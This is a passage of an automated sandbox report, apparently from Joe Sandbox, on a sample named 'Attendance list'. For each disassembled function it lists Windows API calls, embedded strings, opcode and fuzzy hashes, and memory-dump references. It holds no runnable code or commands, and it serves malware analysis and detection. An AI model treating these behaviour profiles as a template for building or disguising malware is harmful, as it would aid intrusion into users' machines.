                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: ccba1c490a27a4f0da474ef5b2052589366714c3df5b09cd8b5ad57cfbf9bd16
                        • Instruction ID: 0770b5e346a3722843d1655ac3db171fe70c210c9e8fccbc384492999ab09c3a
                        • Opcode Fuzzy Hash: ccba1c490a27a4f0da474ef5b2052589366714c3df5b09cd8b5ad57cfbf9bd16
                        • Instruction Fuzzy Hash: 9EF0543E558A13EBE7111B64FC5CDDB7769EF46302B000531F102A10B4CBB55811DB60
                        Function 00918E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00918E7F
                        • UnloadUserProfile.USERENV(?,?), ref: 00918E8B
                        • CloseHandle.KERNEL32(?), ref: 00918E94
                        • CloseHandle.KERNEL32(?), ref: 00918E9C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00918EA5
                        • HeapFree.KERNEL32(00000000), ref: 00918EAC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 243f1ec03beed31897a814b5add2edc958b471154d167c4e0469d0960fc4b4d7
                        • Instruction ID: 6f775a106f654708d874c2afbbbe3e9e4c8b0083d9d4686c4d7f62eb23a44bbd
                        • Opcode Fuzzy Hash: 243f1ec03beed31897a814b5add2edc958b471154d167c4e0469d0960fc4b4d7
                        • Instruction Fuzzy Hash: ACE0527A118506FBDA011FE5EC1CD5ABBA9FB8A762B508631F21981470CB329461EB50
                        Function 00938902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00938928
                        • CharUpperBuffW.USER32(?,?), ref: 00938A37
                        • VariantClear.OLEAUT32(?), ref: 00938BAF
                          • Part of subcall function 00927804: VariantInit.OLEAUT32(00000000), ref: 00927844
                          • Part of subcall function 00927804: VariantCopy.OLEAUT32(00000000,?), ref: 0092784D
                          • Part of subcall function 00927804: VariantClear.OLEAUT32(00000000), ref: 00927859
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: 76573f10c11f6130e9824b2553fe02984ad63c2b57dce66284cc3ccf844d9675
                        • Instruction ID: c20668a623ce9cdca2dae6f51e5968511198f9909af39adf69ba022e8ebfe9c5
                        • Opcode Fuzzy Hash: 76573f10c11f6130e9824b2553fe02984ad63c2b57dce66284cc3ccf844d9675
                        • Instruction Fuzzy Hash: 199148756083029FC710DF28C484A6BBBF4FF89714F14896EF89A8B261DB31E945CB52
                        Function 00922F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • _memset.LIBCMT ref: 00923077
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009230A6
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00923159
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00923187
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: da0c94e7af1af814de6076f7607d41c4b3fc9d8addb5d81d2711d84016949419
                        • Instruction ID: 4a66624c563489a0c539713dcee8a5774f46a19be4da5b7081147f4f7c8b2631
                        • Opcode Fuzzy Hash: da0c94e7af1af814de6076f7607d41c4b3fc9d8addb5d81d2711d84016949419
                        • Instruction Fuzzy Hash: 7E51023161C3209ED724EF28E845A6BB7E8EF85310F048A2DF895D72D6DB78CE548752
                        Function 0091DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0091DAC5
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0091DAFB
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0091DB0C
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0091DB8E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: b68b8066f58d735c49178bbfa61f839ef345892a20ca82edb0f3d2895a8cbbb9
                        • Instruction ID: 3a6bad5bbd5ddfb06850faf2bb29934678c2b1efcc7c706fc5c3cd6e1c25932a
                        • Opcode Fuzzy Hash: b68b8066f58d735c49178bbfa61f839ef345892a20ca82edb0f3d2895a8cbbb9
                        • Instruction Fuzzy Hash: DF41B1B170520CEFDB15CF54C884AEA7BB9EF89310F1185A9AD069F205D7B0DE80DBA0
                        Function 00922C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00922CAF
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00922CCB
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00922D11
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00986890,00000000), ref: 00922D5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: 469e4c0ca5448184464ef4868301c73021da2cfa5e2a389eef6ef4a9a5d4620e
                        • Instruction ID: 9bb2872fc5c3b57658bbe6109d0f48f0500fb299ed2a7184e1782d5806347792
                        • Opcode Fuzzy Hash: 469e4c0ca5448184464ef4868301c73021da2cfa5e2a389eef6ef4a9a5d4620e
                        • Instruction Fuzzy Hash: 45419F34204352AFD720DF28E844B5ABBE8FF85320F14465DF965972E5D770E905CB92
                        Function 0093DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0093DAD9
                          • Part of subcall function 008C79AB: _memmove.LIBCMT ref: 008C79F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharLower_memmove
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 3425801089-567219261
                        • Opcode ID: a3f682e329f3b940fd598e7cd620f4c010cc2a427ee76756210ac95585a23f5a
                        • Instruction ID: af317f1911f24c7e4b3b186199fae7c150b3fec9908d76ae1194f340e0e427e1
                        • Opcode Fuzzy Hash: a3f682e329f3b940fd598e7cd620f4c010cc2a427ee76756210ac95585a23f5a
                        • Instruction Fuzzy Hash: 8F3192716012199FCF10EF58CC919AEB3B8FF05320F108A29E86597691DB71E905CF90
                        Function 00919372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009193F6
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00919409
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00919439
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$_memmove$ClassName
                        • String ID: ComboBox$ListBox
                        • API String ID: 365058703-1403004172
                        • Opcode ID: 0e883f2eb0210832f8c34230118b709169bf5ea5d7956200a8c38454f80492c4
                        • Instruction ID: 315a2fc6fd2a90df6ad65b09f7cb1ad5f12f17d838281e9fa325a2dfb592ac6a
                        • Opcode Fuzzy Hash: 0e883f2eb0210832f8c34230118b709169bf5ea5d7956200a8c38454f80492c4
                        • Instruction Fuzzy Hash: 5721E171A04108BEDB14AB74DC95DFFB77CEF45360B104529F926A72E0DB394A8A9A20
                        Function 00946656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009466D0
                        • LoadLibraryW.KERNEL32(?), ref: 009466D7
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009466EC
                        • DestroyWindow.USER32(?), ref: 009466F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        • API String ID: 4146253029-1011021900
                        • Opcode ID: 36c6041a9672a8e7fbc9f4a70a7ba80751b5b509ece48534c3b7877e4235cd57
                        • Instruction ID: ba042bd70dd5f610910d33d9dc8cda58323e60ea713c491f0db5aaec3e241efa
                        • Opcode Fuzzy Hash: 36c6041a9672a8e7fbc9f4a70a7ba80751b5b509ece48534c3b7877e4235cd57
                        • Instruction Fuzzy Hash: B321AEF121020AAFEF104F68EC80EBB37ADEF5A368F124629F91197190D771CC51A762
                        Function 0092703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 0092705E
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00927091
                        • GetStdHandle.KERNEL32(0000000C), ref: 009270A3
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009270DD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 0179dcfc33a20b38d1c3c9971f9951d6ea33832c946c1137541e3a3b946bb548
                        • Instruction ID: 0b50b1f5018f903ab0698ea47ca607963f2d75071e4d6abec13c5b8f2a10206c
                        • Opcode Fuzzy Hash: 0179dcfc33a20b38d1c3c9971f9951d6ea33832c946c1137541e3a3b946bb548
                        • Instruction Fuzzy Hash: 34219574544225ABDF209F78EC05F9AB7B8BF85720F204A19FCA0E72D4D7709854CB50
                        Function 0092710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 0092712B
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0092715D
                        • GetStdHandle.KERNEL32(000000F6), ref: 0092716E
                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009271A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 75246766dd91f3d70c188bfe2523c98886c80f8e6f5021675e12dd4b0e56c4f1
                        • Instruction ID: 0876086790b5b774c813cccc7d83ad96e0a390b07536a135af47d81eaa2c38e2
                        • Opcode Fuzzy Hash: 75246766dd91f3d70c188bfe2523c98886c80f8e6f5021675e12dd4b0e56c4f1
                        • Instruction Fuzzy Hash: 1C21B67550C2269BDF209FA8AC04EAAF7ECAF55720F200A19FCB0E32D5D7709861C760
                        Function 0092AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092AEBF
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0092AF13
                        • __swprintf.LIBCMT ref: 0092AF2C
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0094F910), ref: 0092AF6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        • API String ID: 3164766367-685833217
                        • Opcode ID: 6d491e3148c4e97d6ef816190a466779a712a5c506ff11651d01b9c4a224d9d3
                        • Instruction ID: f7104a5594c430efda092b9cee2a1db3898ae998ce0c635b97a94d53817b877f
                        • Opcode Fuzzy Hash: 6d491e3148c4e97d6ef816190a466779a712a5c506ff11651d01b9c4a224d9d3
                        • Instruction Fuzzy Hash: 27219235A00119AFCB10DF69D985EEE7BB8FF89704B0040A9F509DB251DB31EE45CB22
                        Function 0091A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 0091A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091A399
                          • Part of subcall function 0091A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0091A3AC
                          • Part of subcall function 0091A37C: GetCurrentThreadId.KERNEL32 ref: 0091A3B3
                          • Part of subcall function 0091A37C: AttachThreadInput.USER32(00000000), ref: 0091A3BA
                        • GetFocus.USER32 ref: 0091A554
                          • Part of subcall function 0091A3C5: GetParent.USER32(?), ref: 0091A3D3
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091A59D
                        • EnumChildWindows.USER32(?,0091A615), ref: 0091A5C5
                        • __swprintf.LIBCMT ref: 0091A5DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        • API String ID: 1941087503-1110647743
                        • Opcode ID: 7312f8f9ca177ab5cca20a64b88de73457cd90ccc0012e2d66caf353da5fd453
                        • Instruction ID: 44d67517bed675fdfd459ad8383dca73cc55d33b91392de4843b5fe54e63e0af
                        • Opcode Fuzzy Hash: 7312f8f9ca177ab5cca20a64b88de73457cd90ccc0012e2d66caf353da5fd453
                        • Instruction Fuzzy Hash: 4311C0712002096BDF107F64EC85FEA377CEF89300F044079BA18AA096DA745D868B36
                        Function 00922017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00922048
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 3964851224-769500911
                        • Opcode ID: 7ab5d64dc93e0ba0738d4267ef46fa8ea8eed540aac18a387aff4fdba2ce7859
                        • Instruction ID: 778f7b9097ae8b51b8b62545de582b7e41128cb04efa5de74ddfd82f02deea0e
                        • Opcode Fuzzy Hash: 7ab5d64dc93e0ba0738d4267ef46fa8ea8eed540aac18a387aff4fdba2ce7859
                        • Instruction Fuzzy Hash: 5711AD30954219DFCF10EFA8D8808EEB3F4FF16300B508968D855A7252EB32A906CF51
                        Function 0093EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0093EF1B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0093EF4B
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0093F07E
                        • CloseHandle.KERNEL32(?), ref: 0093F0FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        • String ID:
                        • API String ID: 2364364464-0
                        • Opcode ID: 029ab1a5807a6589cecf745d7a8d6faa6d677de36cf702d6d46d012877f9122f
                        • Instruction ID: 01eb51bb5379d0cd4d6f8db574813cf029f5668b71e45797ffb0b5678af3df5b
                        • Opcode Fuzzy Hash: 029ab1a5807a6589cecf745d7a8d6faa6d677de36cf702d6d46d012877f9122f
                        • Instruction Fuzzy Hash: 34816D716047119FD720DF28C896F6AB7E5EF88B20F04885DF599DB292DAB0EC408B52
                        Function 009402C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940388
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009403C7
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0094040E
                        • RegCloseKey.ADVAPI32(?,?), ref: 0094043A
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940447
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3440857362-0
                        • Opcode ID: f2e32c8cd2b73ecc034513136f3361c0592f9a3ce88bd89514e23bed387d09db
                        • Instruction ID: 7ce89677ea194958e9433587cde4e5ea7a2dd7c86d1dcc699dcf5955e8fd0639
                        • Opcode Fuzzy Hash: f2e32c8cd2b73ecc034513136f3361c0592f9a3ce88bd89514e23bed387d09db
                        • Instruction Fuzzy Hash: 51514831208205AFD704EF68D881F6EB7E8FF84304F04896DF695872A1DB35E904DB52
                        Function 0093DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
